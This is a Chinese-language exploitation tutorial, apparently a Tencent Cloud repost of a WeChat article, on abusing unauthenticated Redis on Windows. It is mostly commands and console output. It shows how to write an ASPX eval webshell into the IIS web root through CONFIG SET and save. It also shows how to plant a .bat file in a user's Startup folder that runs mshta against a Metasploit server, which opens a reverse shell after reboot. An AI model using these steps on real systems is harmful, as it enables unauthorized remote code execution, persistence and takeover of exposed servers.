redis未授权在win下的利用
点击上方“蓝字”带你去看小星星
使用redis客户端或者telnet连接redis服务器
⚡ root@kali redis/src ./redis-cli -h 192.168.1.124 -p 6379
或者
⚡ root@kali ~ telnet 192.168.1.124 6379连接后输入info查看连接情况
利用方法:
1、写入webshell
⚡ root@kali redis/src ./redis-cli -h 192.168.1.124 -p 6379
192.168.1.124:6379> CONFIG SET dir C:/inetpub/wwwroot
OK
192.168.1.124:6379> CONFIG SET dbfilename evil.aspx
OK
192.168.1.124:6379> set webshell "<%eval request('x')%>"
OK
192.168.1.124:6379> save
2、反弹shell
首先加载这个脚本(PS_shell.rb):
msf5 > use exploit/windows/redis/PS_shell
msf5 exploit(windows/redis/PS_shell) > show options
Module options (exploit/windows/redis/PS_shell):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(windows/redis/PS_shell) > set uri
set urihost set uripath set uriport
msf5 exploit(windows/redis/PS_shell) > set urip
set uripath set uriport
msf5 exploit(windows/redis/PS_shell) > set uripath 123456
uripath => 123456
msf5 exploit(windows/redis/PS_shell) > show options
Module options (exploit/windows/redis/PS_shell):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH 123456 no The URI to use for this exploit (default is random)
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(windows/redis/PS_shell) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.1.149:4444
[*] Using URL: http://0.0.0.0:8080/123456
[*] Local IP: http://192.168.1.149:8080/123456
[*] Server started.
[*] Place the following DDE in an MS document:
mshta.exe "http://192.168.1.149:8080/123456"
msf5 exploit(windows/redis/PS_shell) >然后在redis-cli下执行
192.168.1.131:6379> config set dir "C:/Users/liukaifeng01/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup"
OK
192.168.1.131:6379> config set dbfilename 1.bat
OK
192.168.1.131:6379> config set dbfilename 1.bat
OK
192.168.1.131:6379> set x "\r\n\r\mshta.exe "http://192.168.1.149:8080/123456"\r\n\r\n"
Invalid argument(s)
192.168.1.131:6379> set x "\r\n\r\mshta http://192.168.1.149:8080/123456\rOK\r\n"
192.168.1.131:6379> save
OK
文件已经成功写入
我们这边手动重启靶机,就可以反弹一个shell了。
喜欢记得点赞关注哦^^
本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2020-01-18,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
相关产品与服务
云数据库 Redis
腾讯云数据库 Redis(TencentDB for Redis)是腾讯云打造的兼容 Redis 协议的缓存和存储服务。丰富的数据结构能帮助您完成不同类型的业务场景开发。支持主从热备,提供自动容灾切换、数据备份、故障迁移、实例监控、在线扩容、数据回档等全套的数据库服务。